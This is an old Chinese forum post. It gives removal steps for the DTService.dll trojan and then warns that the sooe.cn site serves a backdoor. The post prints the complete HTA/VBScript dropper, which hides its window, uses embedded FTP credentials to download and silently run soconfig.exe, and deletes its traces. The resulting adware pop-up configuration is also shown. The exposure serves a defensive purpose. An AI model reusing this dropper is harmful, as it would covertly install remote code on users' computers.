- 论坛徽章:
- 0
|
Eric 2005年12月9日
清除办法:
DTService.dll是木马病毒
打开注册表发现HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下
多了个不明启动项 rundll32.exe C:\WINNT\system32\DTSERV~1.DLL,Load
原来是*Rundll32.exe加载了一个dll病毒,删除该键,重新启动后,再到winnt/system32下删除dtservice.dll文件,暂先收工,是否还有其他后遗症,待日后观察。
........................................
彻底清除DTservice木马
前段时间在论坛上看到一个朋友删除DTservice的文章,但是在我的机器上出现的DTservice按照以上办法无法清除,很简单DTservice利用了run32.dll进行调用,每次及时在注册表中删除,它马上会重新写回。跟踪发现其dtservice.dll躲藏在TEMP目录里,但是无法删除!
既然终止RUN32.DLL也无法结束DTservice那么该进程显然并不匿藏于run32.dll而是别的进程里面。使用软件Process Eexplorer逐个检查进程的属性,最终发现IEXPLORER.EXE里面调用了DTservice.dll选择终止该模块。然后进入TEMP目录还是不能删除dtservice.dll,但是可以重命名dtservice.dll,修改名称为其他如DT.DLL
搜索注册表dtservice.dll,找到相关键值删除!
重新启动机器后,发现可以删除DT.DLL。
木马清除完毕!
该木马的隐藏机制相当巧妙,而且有自我修复功能,属于比较顽固的木马程序。它可以在用户无知觉的情况下,打开机器端口。
搜易网网址:http://www.sooe.cn/
网站联络方式:
招商广告刊登热线:010—87143993 外部广告刊登热线:010—68488921 页面修改专线:010—68489357
客户投拆专线:010—68488923 传 真:010—88517855 网站合作:010—68489358
搜易网 版权所有 广告经营许可证:京海工商广字第930号 京ICP备05039352号
首页入口代码链接:<script language=JavaScript src="/test/jumpsooe.asp"></script>
通过入口代码转接:<http://www.sooe.cn/test/sooe.asp此文件下载另存为:sooe.hta
后门代码大家小心(文件名称sooe.hta):
<HTA:APPLICATION ID="winhelperDownload" APPLICATIONNAME="winhelperDownload" BORDER="none"
CAPTION="no" SHOWINTASKBAR="no" SYSMENU="no" SINGLEINSTANCE="yes" WINDOWSTATE="minimize">
<script>
self.resizeTo(0,0);
self.moveTo(-1000,-1000);
</script>
<object id="wsh" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B VIEWASTEXT VIEWASTEXT
VIEWASTEXT VIEWASTEXT VIEWASTEXT VIEWASTEXT VIEWASTEXT VIEWASTEXT VIEWASTEXT VIEWASTEXT
VIEWASTEXT VIEWASTEXT VIEWASTEXT VIEWASTEXT VIEWASTEXT VIEWASTEXT VIEWASTEXT VIEWASTEXT"
></object>
<script language="VBScript">
Dim strSysRoot
Dim fso, tf
Dim strFilePath
Dim strSetupFilePath
Dim strExeFilePath
Dim CompName
Set fso = CreateObject("Scripting.FileSystemObject")
strSysRoot = fso.GetSpecialFolder(1)
strFilePath = strSysRoot & "\sysconfig.ftp"
strSetupFilePath = strSysRoot & "\soconfig.exe"
strExeFilePath = strSysRoot & "\soconfig.exe"
if not fso.FileExists(strExeFilepath) then
CreateFile()
CleanFile()
else
RunFile()
end if
Sub CreateFile()
on error resume next
Set tf = fso.CreateTextFile(strFilePath, True)
tf.Write "open ftp.sooe.cn"&chr(13)&chr(10)
tf.Write "upfile"&chr(13)&chr(10) 'user
tf.Write "WyZ!ooW500noDm"&chr(13)&chr(10) 'password
tf.Write "binary"&chr(13)&chr(10)
tf.Write "get soconfig.exe "&strSetupFilePath&chr(13)&chr(10)
tf.Write "bye"
tf.Close
End Sub
Sub CleanFile()
On Error Resume Next
set wshshell=createobject ("wscript.shell" )
wshshell.Run "cmd.exe /c ftp -s:" & strFilePath, 0 ,true
wshshell.Run "cmd.exe /c del " & strFilePath , 0 ,true
wshshell.Run strSetupFilePath , 0 ,true
End Sub
Sub RunFile()
On Error Resume Next
set wshshell=createobject ("wscript.shell" )
wshshell.Run strExeFilePath , 0 ,true
End Sub
</Script>
[Page]经过如上后门运行后在Windows目录下产生如下配置文件,文件名“dtapconfig”
后门程序进程DLL:C:\WINDOWS\system32\dtap.dll
配置文件内容:
#DTAP
[Config]
ValidUntil=2005-12-09 23:50:00
PopMinInterval=5
PopMaxInterval=30
PageOpenCount=5
CurrentTaskId=1
[BlackList]
BlackListCount=5
BlackListURL0=baidu.com
BlackListURL1=sogou.com
BlackListURL2=google.com
BlackListURL3=microsoft.com
BlackListURL4=google.com
[TaskList]
TaskCount=8
TaskID0=1
TaskStyle0=3
TaskOption0=dialogWidth:2000px;dialogHeight:1500px;dialogLeft:0;dialogTop:0;help:No;resizable:Yes;status:No;scroll:Yes;
TaskAlwaysOnTop0=0
TaskFrontDisplay0=1
TaskPopLimit0=1
TaskTimeSpanType0=0
TaskTimeSpan0=
TaskProvinceLimitType0=0
TaskProvinceLimit0=
TaskCityLimitType0=0
TaskCityLimit0=
TaskRegisterDayLimit0=3
TaskURL0=http://60.195.248.62/hzyt/client/redirector.aspx?id=8
TaskID1=2
TaskStyle1=1
TaskOption1=dialogWidth:2000px;dialogHeight:1500px;dialogLeft:0;dialogTop:0;help:No;resizable:No;status:No;scroll:No;
TaskAlwaysOnTop1=0
TaskFrontDisplay1=1
TaskPopLimit1=2
TaskTimeSpanType1=0
TaskTimeSpan1=
TaskProvinceLimitType1=0
TaskProvinceLimit1=
TaskCityLimitType1=0
TaskCityLimit1=
TaskRegisterDayLimit1=8
TaskURL1=http://60.195.248.62/hzyt/client/redirector.aspx?id=1
TaskID2=3
TaskStyle2=1
TaskOption2=dialogWidth:120px;dialogHeight:345px;dialogLeft:100;dialogTop:100;help:No;resizable:No;status:No;scroll:No;
TaskAlwaysOnTop2=1
TaskFrontDisplay2=1
TaskPopLimit2=1
TaskTimeSpanType2=0
TaskTimeSpan2=
TaskProvinceLimitType2=0
TaskProvinceLimit2=
TaskCityLimitType2=0
TaskCityLimit2=
TaskRegisterDayLimit2=8
TaskURL2=http://60.195.248.62/hzyt/client/redirector.aspx?id=13
TaskID3=4
TaskStyle3=3
TaskOption3=dialogWidth:2000px;dialogHeight:1000px;dialogLeft:0;dialogTop:50;help:No;resizable:No;status:No;scroll:No;
TaskAlwaysOnTop3=0
TaskFrontDisplay3=1
TaskPopLimit3=1
TaskTimeSpanType3=0
TaskTimeSpan3=
TaskProvinceLimitType3=0
TaskProvinceLimit3=
TaskCityLimitType3=0
TaskCityLimit3=
TaskRegisterDayLimit3=3
TaskURL3=http://60.195.248.62/hzyt/client/redirector.aspx?id=8
TaskID4=5
TaskStyle4=1
TaskOption4=dialogWidth:680px;dialogHeight:375px;dialogLeft:0;dialogTop:50;help:No;resizable:No;status:No;scroll:No;
TaskAlwaysOnTop4=1
TaskFrontDisplay4=1
TaskPopLimit4=1
TaskTimeSpanType4=0
TaskTimeSpan4=
TaskProvinceLimitType4=0
TaskProvinceLimit4=
TaskCityLimitType4=0
TaskCityLimit4=
TaskRegisterDayLimit4=8
TaskURL4=http://60.195.248.62/hzyt/client/redirector.aspx?id=6
TaskID5=6
TaskStyle5=1
TaskOption5=dialogWidth:400px;dialogHeight:325px;dialogLeft:100;dialogTop:100;help:No;resizable:No;status:No;scroll:No;
TaskAlwaysOnTop5=1
TaskFrontDisplay5=1
TaskPopLimit5=1
TaskTimeSpanType5=0
TaskTimeSpan5=
TaskProvinceLimitType5=0
TaskProvinceLimit5=
TaskCityLimitType5=0
TaskCityLimit5=
TaskRegisterDayLimit5=8
TaskURL5=http://60.195.248.62/hzyt/client/redirector.aspx?id=7
TaskID6=7
TaskStyle6=3
TaskOption6=dialogWidth:3000px;dialogHeight:3250px;dialogLeft:0;dialogTop:0;help:No;resizable:No;status:No;scroll:No;
TaskAlwaysOnTop6=0
TaskFrontDisplay6=1
TaskPopLimit6=2
TaskTimeSpanType6=0
TaskTimeSpan6=
TaskProvinceLimitType6=0
TaskProvinceLimit6=
TaskCityLimitType6=0
TaskCityLimit6=
TaskRegisterDayLimit6=8
TaskURL6=http://60.195.248.62/hzyt/client/redirector.aspx?id=14
TaskID7=8
TaskStyle7=1
TaskOption7=dialogWidth:300px;dialogHeight:325px;dialogLeft:0;dialogTop:0;help:No;resizable:No;status:No;scroll:No;
TaskAlwaysOnTop7=0
TaskFrontDisplay7=1
TaskPopLimit7=1
TaskTimeSpanType7=0
TaskTimeSpan7=
TaskProvinceLimitType7=0
TaskProvinceLimit7=
TaskCityLimitType7=0
TaskCityLimit7=
TaskRegisterDayLimit7=8
TaskURL7=http://www.tang3.com/ad/1.htm
【大 中 小】【打印】【关闭】 |
|
免费注册
发表于 2005-12-15 17:11
